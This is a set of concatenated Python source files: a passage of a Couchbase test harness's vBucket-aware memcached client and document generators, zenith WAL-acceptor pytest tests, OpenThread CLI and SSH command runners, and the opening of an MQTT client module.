return self._getMulti_parallel(keys_lst, pause_sec, timeout_sec, collection=collection)
except ImportError:
return self._getMulti_seq(keys_lst, pause_sec, timeout_sec, collection=collection)
else:
return self._getMulti_seq(keys_lst, pause_sec, timeout_sec, collection=collection)
def _getMulti_seq(self, keys_lst, pause_sec=1, timeout_sec=5, collection=None):
server_keys = self._get_server_keys_dic(keys_lst) # set keys in their respective vbuckets and identify the server for each vBucketId
keys_vals = {}
for server_str, keys in list(server_keys.items()) : # get memcached client against each server and multi get
mc = self.memcacheds[server_str]
keys_vals.update(self._getMulti_from_mc(mc, keys, pause_sec, timeout_sec, self._getMulti_seq, collection=collection))
if len(keys_lst) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(set(keys_lst).difference(list(keys_vals.keys()))))
return keys_vals
def _getMulti_parallel(self, keys_lst, pause_sec=1, timeout_sec=5, collection=None):
server_keys = self._get_server_keys_dic(keys_lst)
tasks = []
import concurrent.futures
with concurrent.futures.ThreadPoolExecutor(max_workers=len(server_keys)) as executor:
for server_str, keys in list(server_keys.items()) :
mc = self.memcacheds[server_str]
tasks.append(executor.submit(self._getMulti_from_mc, mc, keys, pause_sec, timeout_sec, self._getMulti_parallel, collection=collection))
keys_vals = self._reduce_getMulti_values(tasks, pause_sec, timeout_sec)
if len(set(keys_lst)) != len(keys_vals):
raise ValueError("Not able to get values for following keys - {0}".format(set(keys_lst).difference(list(keys_vals[collection].keys()))))
return keys_vals
def _getMulti_from_mc(self, memcached_client, keys, pause, timeout, rec_caller_fn, collection=None):
try:
if collection:
self.enable_collection(memcached_client)
return memcached_client.getMulti(keys, collection=collection)
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and timeout > 0:
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
return rec_caller_fn(keys, pause, timeout - pause, collection=collection)
else:
raise error
except BaseException as error:
if timeout <= 0:
raise error
time.sleep(pause)
self.reset_vbuckets(self.rest, self._get_vBucket_ids(keys))
            return rec_caller_fn(keys, pause, timeout - pause, collection=collection)
def _reduce_getMulti_values(self, tasks, pause, timeout):
keys_vals = {}
import concurrent.futures
now = time.time()
for future in concurrent.futures.as_completed(tasks, timeout):
if future.exception() is not None:
self.log.error("exception in {0} sec".format(time.time() - now))
raise future.exception()
keys_vals.update(future.result())
return keys_vals
def _get_server_keys_dic(self, keys):
server_keys = {}
for key in keys:
vBucketId = self._get_vBucket_id(key)
server_str = self.vBucketMap[vBucketId]
if server_str not in server_keys :
server_keys[server_str] = []
server_keys[server_str].append(key)
return server_keys
def _get_vBucket_ids(self, keys, collection=None):
return {self._get_vBucket_id(key) for key in keys}
def _get_vBucket_id(self, key, collection=None):
return (zlib.crc32(key.encode()) >> 16) & (len(self.vBucketMap) - 1)
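    # Illustrative sketch of the crc32-based mapping above: for a 1024-vbucket map the
    # expression below yields an int in [0, 1023] for any key (the key is made up):
    #   (zlib.crc32("user-123".encode()) >> 16) & (1024 - 1)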
def delete(self, key, collection=None):
vb_error = 0
while True:
try:
return self._send_op(self.memcached(key).delete, key, collection=collection)
except MemcachedError as error:
if error.status in [ERR_NOT_MY_VBUCKET, ERR_EINVAL] and vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
except (EOFError, socket.error) as error:
if "Got empty data (remote died?)" in str(error) or \
"Timeout waiting for socket" in str(error) or \
"Broken pipe" in str(error) or "Connection reset by peer" in str(error) \
and vb_error < 5:
self.reset_vbuckets(self.rest, set([key], collection=collection))
vb_error += 1
else:
raise error
except BaseException as error:
if vb_error < 5:
self.reset_vbuckets(self.rest, {self._get_vBucket_id(key)})
vb_error += 1
else:
raise error
def _send_op(self, func, *args, **kargs):
backoff = .001
while True:
try:
return func(*args, **kargs)
except MemcachedError as error:
if error.status == ERR_ETMPFAIL and backoff < .5:
time.sleep(backoff)
backoff *= 2
else:
raise error
except (EOFError, IOError, socket.error) as error:
raise MemcachedError(ERR_NOT_MY_VBUCKET, "Connection reset with error: {0}".format(error))
def done(self):
[self.memcacheds[ip].close() for ip in self.memcacheds]
def _parse_not_my_vbucket_error(self, error):
error_msg = error.msg
if "Connection reset with error:" in error_msg:
self.log.error("{0} while _send_op, server is alive?".format(error_msg))
return None
vbuckets = []
try:
error_json = json.loads(error_msg[error_msg.find('{'):error_msg.rfind('}') + 1])
except:
self.log.error("Error while getting CCCP from not_my_vbucket...\n %s" % error_msg)
return None
if 'vBucketMapForward' in error_json['vBucketServerMap']:
vBucketMap = error_json['vBucketServerMap']['vBucketMapForward']
else:
vBucketMap = error_json['vBucketServerMap']['vBucketMap']
serverList = error_json['vBucketServerMap']['serverList']
if not self.rest:
self.rest = RestConnection(self.info)
serverList = [server.replace("$HOST", str(self.rest.ip))
if server.find("$HOST") != -1 else server for server in serverList]
counter = 0
for vbucket in vBucketMap:
vbucketInfo = vBucket()
vbucketInfo.master = serverList[vbucket[0]]
if vbucket:
for i in range(1, len(vbucket)):
if vbucket[i] != -1:
vbucketInfo.replica.append(serverList[vbucket[i]])
vbucketInfo.id = counter
counter += 1
vbuckets.append(vbucketInfo)
return vbuckets
    def sendHellos(self, feature_flag):
        for m in self.memcacheds:
            self.memcacheds[m].hello(feature_flag)
class KVStoreAwareSmartClient(VBucketAwareMemcached):
def __init__(self, rest, bucket, kv_store=None, info=None, store_enabled=True, collection=None):
VBucketAwareMemcached.__init__(self, rest, bucket, info, collection=collection)
self.kv_store = kv_store or ClientKeyValueStore()
self.store_enabled = store_enabled
self._rlock = threading.Lock()
    def set(self, key, value, ttl=-1, flag=0, collection=None):
        self._rlock.acquire()
        try:
            if ttl >= 0:
                self.memcached(key).set(key, ttl, 0, value, collection=collection)
            else:
                self.memcached(key).set(key, 0, 0, value, collection=collection)
            if self.store_enabled:
                self.kv_store.write(key, hashlib.md5(value.encode()).digest(), ttl)
        finally:
            # release the lock on every exit path; exceptions propagate unchanged
            self._rlock.release()
"""
" retrieve meta data of document from disk
"""
def get_doc_metadata(self, num_vbuckets, key, collection=None):
vid = crc32.crc32_hash(key) & (num_vbuckets - 1)
mc = self.memcached(key, collection=collection)
metadatastats = None
try:
metadatastats = mc.stats("vkey {0} {1}".format(key, vid))
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
self.log.info(msg)
return metadatastats
    def delete(self, key, collection=None):
        self._rlock.acquire()
        try:
            opaque, cas, data = self.memcached(key).delete(key, collection=collection)
            if self.store_enabled:
                self.kv_store.delete(key, collection=collection)
        except Exception as e:
            raise MemcachedError(7, str(e))
        finally:
            # release exactly once, even when an exception is raised
            self._rlock.release()
        if cas == 0:
            raise MemcachedError(7, "Invalid cas value")
def get_valid_key(self, key, collection=None):
return self.get_key_check_status(key, "valid", collection=collection)
def get_deleted_key(self, key, collection=None):
return self.get_key_check_status(key, "deleted", collection=collection)
def get_expired_key(self, key, collection=None):
return self.get_key_check_status(key, "expired", collection=collection)
def get_all_keys(self, collection=None):
return self.kv_store.keys(collection=collection)
def get_all_valid_items(self, collection=None):
return self.kv_store.valid_items(collection=collection)
def get_all_deleted_items(self, collection=None):
return self.kv_store.deleted_items(collection=collection)
    def get_all_expired_items(self, collection=None):
return self.kv_store.expired_items(collection=collection)
    def get_key_check_status(self, key, status, collection=None):
        item = self.kv_get(key, collection=collection)
        if item is not None and item["status"] == status:
            return item
else:
msg = "key {0} is not valid".format(key)
self.log.info(msg)
return None
# safe kvstore retrieval
# return dict of {key,status,value,ttl}
# or None if not found
    def kv_get(self, key, collection=None):
item = None
try:
item = self.kv_store.read(key, collection=collection)
except KeyError:
msg = "key {0} doesn't exist in store".format(key)
# self.log.info(msg)
return item
# safe memcached retrieval
# return dict of {key, flags, seq, value}
# or None if not found
def mc_get(self, key, collection=None):
item = self.mc_get_full(key, collection=collection)
if item is not None:
item["value"] = hashlib.md5(item["value"]).digest()
return item
# unhashed value
def mc_get_full(self, key, collection=None):
item = None
try:
x, y, value = self.memcached(key).get(key, collection=collection)
item = {}
item["key"] = key
item["flags"] = x
item["seq"] = y
item["value"] = value
except MemcachedError:
msg = "key {0} doesn't exist in memcached".format(key)
return item
def kv_mc_sync_get(self, key, status, collection=None):
self._rlock.acquire()
kv_item = self.get_key_check_status(key, status, collection=collection)
mc_item = self.mc_get(key, collection=collection)
self._rlock.release()
return kv_item, mc_item
class KVStoreSmartClientHelper(object):
@staticmethod
def do_verification(client, collection=None):
keys = client.get_all_keys(collection=collection)
validation_failures = {}
for k in keys:
m, valid = KVStoreSmartClientHelper.verify_key(client, k, collection=collection)
            if not valid:
validation_failures[k] = m
return validation_failures
@staticmethod
def verify_key(client, key, collection=None):
status = False
msg = ""
item = client.kv_get(key, collection=collection)
if item is not None:
if item["status"] == "deleted":
msg, status = \
KVStoreSmartClientHelper.verify_delete(client, key, collection=collection)
elif item["status"] == "expired":
msg, status = \
KVStoreSmartClientHelper.verify_expired(client, key, collection=collection)
elif item["status"] == "valid":
msg, status = \
KVStoreSmartClientHelper.verify_set(client, key, collection=collection)
return msg, status
# verify kvstore contains key with valid status
# and that key also exists in memcached with
# expected value
@staticmethod
def verify_set(client, key, collection=None):
kv_item = client.get_valid_key(key, collection=collection)
mc_item = client.mc_get(key, collection=collection)
status = False
msg = ""
        if kv_item is not None and mc_item is not None:
            # compare values
            if kv_item["value"] == mc_item["value"]:
                status = True
            else:
                msg = "kvstore and memcached values mismatch"
        elif kv_item is None:
            msg = "valid status not set in kv_store"
        elif mc_item is None:
            msg = "key missing from memcached"
return msg, status
# verify kvstore contains key with deleted status
# and that it does not exist in memcached
@staticmethod
def verify_delete(client, key, collection=None):
deleted_kv_item = client.get_deleted_key(key, collection=collection)
mc_item = client.mc_get(key, collection=collection)
status = False
msg = ""
        if deleted_kv_item is not None and mc_item is None:
            status = True
        elif deleted_kv_item is None:
            msg = "delete status not set in kv_store"
        elif mc_item is not None:
            msg = "key still exists in memcached"
return msg, status
# verify kvstore contains key with expired status
# and that key has also expired in memcached
@staticmethod
def verify_expired(client, key, collection=None):
expired_kv_item = client.get_expired_key(key, collection=collection)
mc_item = client.mc_get(key, collection=collection)
status = False
msg = ""
        if expired_kv_item is not None and mc_item is None:
            status = True
        elif expired_kv_item is None:
            msg = "exp. status not set in kv_store"
        elif mc_item is not None:
            msg = "key still exists in memcached"
return msg, status
def start_reader_process(info, keyset, queue):
ReaderThread(info, keyset, queue).start()
class GeneratedDocuments(object):
def __init__(self, items, kv_template, options=dict(size=1024)):
self._items = items
self._kv_template = kv_template
self._options = options
self._pointer = 0
if "padding" in options:
self._pad = options["padding"]
else:
self._pad = DocumentGenerator._random_string(options["size"])
self._pad = self._pad.decode()
# Required for the for-in syntax
def __iter__(self):
return self
def __len__(self):
return self._items
def reset(self):
self._pointer = 0
def has_next(self):
return self._pointer != self._items
# Returns the next value of the iterator
def __next__(self):
if self._pointer == self._items:
raise StopIteration
else:
i = self._pointer
doc = {"meta":{"id": "{0}-{1}".format(i, self._options["seed"])}, "json":{}}
for k in self._kv_template:
v = self._kv_template[k]
if isinstance(v, str) and v.find("${prefix}") != -1:
v = v.replace("${prefix}", "{0}".format(i))
# how about the value size
if isinstance(v, str) and v.find("${padding}") != -1:
v = v.replace("${padding}", self._pad)
if isinstance(v, str) and v.find("${seed}") != -1:
v = v.replace("${seed}", "{0}".format(self._options["seed"]))
doc["json"][k] = v
self._pointer += 1
return json.dumps(doc)
class DocumentGenerator(object):
# will loop over all values in props and replace ${prefix} with ${i}
@staticmethod
def make_docs(items, kv_template, options=dict(size=1024, seed=str(uuid.uuid4()))):
return GeneratedDocuments(items, kv_template, options)
@staticmethod
def _random_string(length):
return (("%%0%dX" % (length * 2)) % random.getrandbits(length * 8)).encode("ascii")
@staticmethod
def create_value(pattern, size):
return (pattern * (size // len(pattern))) + pattern[0:(size % len(pattern))]
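    # e.g. create_value("ab", 5) -> "ababa": the pattern is tiled
    # size // len(pattern) times, then topped up with the first
    # size % len(pattern) characters of the pattern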
@staticmethod
def get_doc_generators(count, kv_template=None, seed=None, sizes=None):
seed = seed or str(uuid.uuid4())[0:7]
sizes = sizes or [128]
doc_gen_iterators = []
if kv_template is None:
kv_template = {"name": "doc-${prefix}-${seed}",
"sequence": "${seed}",
"email": "${prefix}@couchbase.com"}
for size in sizes:
options = {"size": size, "seed": seed}
docs = DocumentGenerator.make_docs(count // len(sizes),
kv_template, options)
doc_gen_iterators.append(docs)
return doc_gen_iterators
@staticmethod
def get_doc_generators_by_load_ratio(rest,
bucket='default',
ram_load_ratio=1,
value_size_distribution=None,
seed=None):
log = logger.Logger.get_logger()
        if ram_load_ratio < 0:
raise MemcachedClientHelperExcetion(errorcode='invalid_argument',
message="ram_load_ratio")
if not value_size_distribution:
value_size_distribution = {16: 0.25, 128: 0.25, 512: 0.25, 1024: 0.25}
        doc_generators = []
        info = rest.get_bucket(bucket)
        emptySpace = info.stats.ram - info.stats.memUsed
        space_to_fill = (int((emptySpace * ram_load_ratio) / 100.0))
        log.info('space_to_fill : {0}, emptySpace : {1}'.format(space_to_fill, emptySpace))
        # note: the accumulator must not be named `list`, otherwise the call to
        # list(...) below would try to call the (shadowed) empty list itself
        for size, probability in list(value_size_distribution.items()):
            how_many = int(space_to_fill / (size + 250) * probability)
            doc_seed = seed or str(uuid.uuid4())
            kv_template = {"name": "user-${prefix}", "payload": "memcached-json-${prefix}-${padding}",
                           "size": size, "seed": doc_seed}
            options = {"size": size, "seed": doc_seed}
            payload_generator = DocumentGenerator.make_docs(how_many, kv_template, options)
            doc_generators.append({'size': size, 'value': payload_generator, 'how_many': how_many, 'seed': doc_seed})
        return doc_generators
# docs = DocumentGenerator.make_docs(number_of_items,
# {"name": "user-${prefix}", "payload": "payload-${prefix}-${padding}"},
# {"size": 1024, "seed": str(uuid.uuid4())})
# Format of the json documents that mcsoda uses.
# JSON BODY
# {
# "key":"%s",
# "key_num":%s,
# "name":"%s",
# "email":"%s",
# "city":"%s",
# "country":"%s",
# "realm":"%s",
# "coins":%s,
# "achievements":%s
# }
class LoadWithMcsoda(object):
def __init__(self, master, num_docs, prefix='', bucket='default', rest_user='Administrator',
rest_password="password", protocol='membase-binary', port=11211):
rest = RestConnection(master)
self.bucket = bucket
vBuckets = rest.get_vbuckets(self.bucket)
self.vbucket_count = len(vBuckets)
self.cfg = {
'max-items': num_docs,
'max-creates': num_docs,
'min-value-size': 128,
'exit-after-creates': 1,
'ratio-sets': 1,
'ratio-misses': 0,
'ratio-creates': 1,
'ratio-deletes': 0,
'ratio-hot': 0,
'ratio-hot-sets': 1,
'ratio-hot-gets': 0,
'ratio-expirations': 0,
'expiration': 0,
'threads': 1,
'json': 1,
'batch': 10,
'vbuckets': self.vbucket_count,
'doc-cache': 0,
'doc-gen': 0,
'prefix': prefix,
'socket-timeout': 60,
}
self.protocol = protocol
self.rest_user = rest_user
self.rest_password = rest_password
if protocol == 'membase-binary':
self.host_port = "{0}:{1}:{2}".format(master.ip, master.port, port)
elif protocol == 'memcached-binary':
self.host_port = "{0}:{1}:{1}".format(master.ip, port)
self.ctl = { 'run_ok': True }
def protocol_parse(self, protocol_in):
if protocol_in.find('://') >= 0:
protocol = \
'-'.join(((["membase"] + \
protocol_in.split("://"))[-2] + "-binary").split('-')[0:2])
if TestInputSingleton.input.param("is_secure", False):
port = server_ports.ssl_rest_port
else:
port = server_ports.rest_port
host_port = ('@' + protocol_in.split("://")[-1]).split('@')[-1] + ":" + port
user, pswd = (('@' + protocol_in.split("://")[-1]).split('@')[-2] + ":").split(':')[0:2]
log.info("-->data_helper:host_port={}".format(host_port))
return protocol, host_port, user, pswd
def get_cfg(self):
return self.cfg
def load_data(self, collection=None):
cur, start_time, end_time = mcsoda.run(self.cfg, {}, self.protocol, self.host_port, self.rest_user, \
self.rest_password, ctl=self.ctl, bucket=self.bucket)
return cur
def load_stop(self):
self.ctl['run_ok'] = False
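# A minimal usage sketch (not part of the original module; `master` is assumed
# to be a server object exposing .ip and .port, as consumed by RestConnection):
#
#   loader = LoadWithMcsoda(master, num_docs=10000, prefix='load-')
#   loader.load_data()
#   loader.load_stop()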
|
test_wal_acceptor.py
|
import pytest
import random
import time
from contextlib import closing
from multiprocessing import Process, Value
from fixtures.zenith_fixtures import WalAcceptorFactory, ZenithPageserver, PostgresFactory
pytest_plugins = ("fixtures.zenith_fixtures",)
# basic test, write something in setup with wal acceptors, ensure that commits
# succeed and data is written
def test_normal_work(zenith_cli, pageserver: ZenithPageserver, postgres: PostgresFactory, wa_factory):
zenith_cli.run(["branch", "test_wal_acceptors_normal_work", "empty"])
wa_factory.start_n_new(3)
pg = postgres.create_start('test_wal_acceptors_normal_work',
wal_acceptors=wa_factory.get_connstrs())
with closing(pg.connect()) as conn:
with conn.cursor() as cur:
# we rely upon autocommit after each statement
# as waiting for acceptors happens there
cur.execute('CREATE TABLE t(key int primary key, value text)')
cur.execute("INSERT INTO t SELECT generate_series(1,100000), 'payload'")
cur.execute('SELECT sum(key) FROM t')
assert cur.fetchone() == (5000050000, )
# Run page server and multiple acceptors, and multiple compute nodes running
# against different timelines.
def test_many_timelines(zenith_cli, pageserver: ZenithPageserver, postgres: PostgresFactory, wa_factory):
n_timelines = 2
wa_factory.start_n_new(3)
branches = ["test_wal_acceptors_many_timelines_{}".format(tlin) for tlin in range(n_timelines)]
# start postgres on each timeline
pgs = []
for branch in branches:
zenith_cli.run(["branch", branch, "empty"])
pgs.append(postgres.create_start(branch, wal_acceptors=wa_factory.get_connstrs()))
# Do everything in different loops to have actions on different timelines
# interleaved.
# create schema
for pg in pgs:
pg.safe_psql("CREATE TABLE t(key int primary key, value text)")
# Populate data
for pg in pgs:
pg.safe_psql("INSERT INTO t SELECT generate_series(1,100000), 'payload'")
# Check data
for pg in pgs:
res = pg.safe_psql("SELECT sum(key) FROM t")
assert res[0] == (5000050000, )
# Check that dead minority doesn't prevent the commits: execute insert n_inserts
# times, with fault_probability chance of getting a wal acceptor down or up
# along the way. 2 of 3 are always alive, so the work keeps going.
def test_restarts(zenith_cli, pageserver: ZenithPageserver, postgres: PostgresFactory, wa_factory: WalAcceptorFactory):
fault_probability = 0.01
n_inserts = 1000
n_acceptors = 3
wa_factory.start_n_new(n_acceptors)
zenith_cli.run(["branch", "test_wal_acceptors_restarts", "empty"])
pg = postgres.create_start('test_wal_acceptors_restarts',
wal_acceptors=wa_factory.get_connstrs())
# we rely upon autocommit after each statement
# as waiting for acceptors happens there
pg_conn = pg.connect()
cur = pg_conn.cursor()
failed_node = None
cur.execute('CREATE TABLE t(key int primary key, value text)')
for i in range(n_inserts):
cur.execute("INSERT INTO t values (%s, 'payload');", (i + 1, ))
if random.random() <= fault_probability:
if failed_node is None:
failed_node = wa_factory.instances[random.randrange(0, n_acceptors)]
failed_node.stop()
else:
failed_node.start()
failed_node = None
cur.execute('SELECT sum(key) FROM t')
assert cur.fetchone() == (500500, )
start_delay_sec = 2
def delayed_wal_acceptor_start(wa):
time.sleep(start_delay_sec)
wa.start()
# When majority of acceptors is offline, commits are expected to be frozen
def test_unavailability(zenith_cli, postgres: PostgresFactory, wa_factory):
wa_factory.start_n_new(2)
zenith_cli.run(["branch", "test_wal_acceptors_unavailability", "empty"])
pg = postgres.create_start('test_wal_acceptors_unavailability',
wal_acceptors=wa_factory.get_connstrs())
# we rely upon autocommit after each statement
# as waiting for acceptors happens there
pg_conn = pg.connect()
cur = pg_conn.cursor()
# check basic work with table
cur.execute('CREATE TABLE t(key int primary key, value text)')
cur.execute("INSERT INTO t values (1, 'payload')")
# shutdown one of two acceptors, that is, majority
wa_factory.instances[0].stop()
proc = Process(target=delayed_wal_acceptor_start, args=(wa_factory.instances[0], ))
proc.start()
start = time.time()
cur.execute("INSERT INTO t values (2, 'payload')")
# ensure that the query above was hanging while acceptor was down
assert (time.time() - start) >= start_delay_sec
proc.join()
# for the world's balance, do the same with second acceptor
wa_factory.instances[1].stop()
proc = Process(target=delayed_wal_acceptor_start, args=(wa_factory.instances[1], ))
proc.start()
start = time.time()
cur.execute("INSERT INTO t values (3, 'payload')")
# ensure that the query above was hanging while acceptor was down
assert (time.time() - start) >= start_delay_sec
proc.join()
cur.execute("INSERT INTO t values (4, 'payload')")
cur.execute('SELECT sum(key) FROM t')
assert cur.fetchone() == (10, )
# shut down random subset of acceptors, sleep, wake them up, rinse, repeat
def xmas_garland(acceptors, stop):
while not bool(stop.value):
victims = []
for wa in acceptors:
if random.random() >= 0.5:
victims.append(wa)
for v in victims:
v.stop()
time.sleep(1)
for v in victims:
v.start()
time.sleep(1)
# value which gets unset on exit
@pytest.fixture
def stop_value():
stop = Value('i', 0)
yield stop
stop.value = 1
# do inserts while concurrently getting up/down subsets of acceptors
def test_race_conditions(zenith_cli, pageserver: ZenithPageserver, postgres: PostgresFactory, wa_factory, stop_value):
wa_factory.start_n_new(3)
zenith_cli.run(["branch", "test_wal_acceptors_race_conditions", "empty"])
pg = postgres.create_start('test_wal_acceptors_race_conditions',
wal_acceptors=wa_factory.get_connstrs())
# we rely upon autocommit after each statement
# as waiting for acceptors happens there
pg_conn = pg.connect()
cur = pg_conn.cursor()
cur.execute('CREATE TABLE t(key int primary key, value text)')
proc = Process(target=xmas_garland, args=(wa_factory.instances, stop_value))
proc.start()
for i in range(1000):
cur.execute("INSERT INTO t values (%s, 'payload');", (i + 1, ))
cur.execute('SELECT sum(key) FROM t')
assert cur.fetchone() == (500500, )
stop_value.value = 1
proc.join()
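# These tests are plain pytest functions; assuming the fixtures package is on
# PYTHONPATH, a single scenario can be run with, for example:
#
#   pytest test_wal_acceptor.py -k test_restarts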
|
command_handlers.py
|
#!/usr/bin/env python3
#
# Copyright (c) 2020, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import logging
import queue
import re
import threading
import time
from abc import abstractmethod
from typing import Any, Callable, Optional, Union, List, Pattern
from .connectors import OtCliHandler
from .errors import ExpectLineTimeoutError, CommandError
from .utils import match_line
class OTCommandHandler:
"""This abstract class defines interfaces of a OT Command Handler."""
@abstractmethod
def execute_command(self, cmd: str, timeout: float) -> List[str]:
"""Method execute_command should execute the OT CLI command within a timeout (in seconds) and return the
command output as a list of lines.
Note: each line SHOULD NOT contain '\r\n' at the end. The last line of output should be 'Done' or
'Error <code>: <msg>' following OT CLI conventions.
"""
pass
@abstractmethod
def close(self):
"""Method close should close the OT Command Handler."""
pass
@abstractmethod
def wait(self, duration: float) -> List[str]:
"""Method wait should wait for a given duration and return the OT CLI output during this period.
Normally, OT CLI does not output when it's not executing any command. But OT CLI can also output
asynchronously in some cases (e.g. `Join Success` when Joiner joins successfully).
"""
pass
@abstractmethod
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
"""Method set_line_read_callback should register a callback that will be called for every line
output by the OT CLI.
This is useful for handling asynchronous command output while still being able to execute
other commands.
"""
pass
def shell(self, cmd: str, timeout: float) -> List[str]:
raise NotImplementedError("shell command is not supported on %s" % self.__class__.__name__)
class OtCliCommandRunner(OTCommandHandler):
__PATTERN_COMMAND_DONE_OR_ERROR = re.compile(
r'(Done|Error|Error \d+:.*|.*: command not found)$') # "Error" for spinel-cli.py
__PATTERN_LOG_LINE = re.compile(r'((\[(NONE|CRIT|WARN|NOTE|INFO|DEBG)\])'
r'|(-.*-+: )' # e.g. -CLI-----:
r')')
"""regex used to filter logs"""
__ASYNC_COMMANDS = {'scan', 'ping', 'discover'}
def __init__(self, otcli: OtCliHandler, is_spinel_cli=False):
self.__otcli: OtCliHandler = otcli
self.__is_spinel_cli = is_spinel_cli
self.__expect_command_echoback = not self.__is_spinel_cli
self.__line_read_callback = None
self.__pending_lines = queue.Queue()
self.__should_close = threading.Event()
self.__otcli_reader = threading.Thread(target=self.__otcli_read_routine)
        self.__otcli_reader.daemon = True
self.__otcli_reader.start()
def __repr__(self):
return repr(self.__otcli)
def execute_command(self, cmd, timeout=10) -> List[str]:
self.__otcli.writeline(cmd)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
self.__otcli.writeline('extaddr')
self.wait(1)
return []
if self.__expect_command_echoback:
self.__expect_line(timeout, cmd)
output = self.__expect_line(timeout,
OtCliCommandRunner.__PATTERN_COMMAND_DONE_OR_ERROR,
asynchronous=cmd.split()[0] in OtCliCommandRunner.__ASYNC_COMMANDS)
return output
def wait(self, duration: float) -> List[str]:
self.__otcli.wait(duration)
output = []
try:
while True:
line = self.__pending_lines.get_nowait()
output.append(line)
except queue.Empty:
pass
return output
def close(self):
self.__should_close.set()
self.__otcli.close()
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
#
# Private methods
#
def __expect_line(self, timeout: float, expect_line: Union[str, Pattern], asynchronous=False) -> List[str]:
output = []
if not asynchronous:
while True:
try:
line = self.__pending_lines.get(timeout=timeout)
except queue.Empty:
raise ExpectLineTimeoutError(expect_line)
output.append(line)
if match_line(line, expect_line):
break
else:
done = False
while not done and timeout > 0:
lines = self.wait(1)
timeout -= 1
for line in lines:
output.append(line)
if match_line(line, expect_line):
done = True
break
if not done:
raise ExpectLineTimeoutError(expect_line)
return output
def __otcli_read_routine(self):
        while not self.__should_close.is_set():
line = self.__otcli.readline()
logging.debug('%s: %r', self.__otcli, line)
if line.startswith('> '):
line = line[2:]
if self.__line_read_callback is not None:
self.__line_read_callback(line)
logging.debug('%s: %s', self.__otcli, line)
if not OtCliCommandRunner.__PATTERN_LOG_LINE.match(line):
self.__pending_lines.put(line)
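# A minimal usage sketch (not part of the original module; `cli` stands for any
# OtCliHandler implementation from .connectors):
#
#   runner = OtCliCommandRunner(cli)
#   lines = runner.execute_command('state')    # e.g. ['leader', 'Done']
#   runner.close()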
class OtbrSshCommandRunner(OTCommandHandler):
def __init__(self, host, port, username, password, sudo):
import paramiko
self.__host = host
self.__port = port
self.__sudo = sudo
self.__ssh = paramiko.SSHClient()
self.__ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.__line_read_callback = None
try:
self.__ssh.connect(host,
port=port,
username=username,
password=password,
allow_agent=False,
look_for_keys=False)
except paramiko.ssh_exception.AuthenticationException:
if not password:
self.__ssh.get_transport().auth_none(username)
else:
raise
def __repr__(self):
return f'{self.__host}:{self.__port}'
def execute_command(self, cmd: str, timeout: float) -> List[str]:
sh_cmd = f'ot-ctl {cmd}'
if self.__sudo:
sh_cmd = 'sudo ' + sh_cmd
output = self.shell(sh_cmd, timeout=timeout)
if self.__line_read_callback is not None:
for line in output:
self.__line_read_callback(line)
if cmd in ('reset', 'factoryreset'):
self.wait(3)
return output
def shell(self, cmd: str, timeout: float) -> List[str]:
cmd_in, cmd_out, cmd_err = self.__ssh.exec_command(cmd, timeout=int(timeout), bufsize=1024)
errput = [l.rstrip('\r\n') for l in cmd_err.readlines()]
output = [l.rstrip('\r\n') for l in cmd_out.readlines()]
if errput:
raise CommandError(cmd, errput)
return output
def close(self):
self.__ssh.close()
def wait(self, duration: float) -> List[str]:
time.sleep(duration)
return []
def set_line_read_callback(self, callback: Optional[Callable[[str], Any]]):
self.__line_read_callback = callback
|
mqtt_client.py
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
MQTT client utility: Tries to hide Paho client details to ease MQTT usage.
Reconnects to the MQTT server automatically.
This module depends on the paho-mqtt package (ex-mosquitto), provided by the
Eclipse Foundation: see http://www.eclipse.org/paho
:author: Thomas Calmant
:copyright: Copyright 2016, Thomas Calmant
:license: Apache License 2.0
:version: 0.6.4
..
Copyright 2016 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import logging
import os
import sys
import threading
# MQTT client
import paho.mqtt.client as paho
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (0, 6, 4)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
_logger = logging.getLogger(__name__)
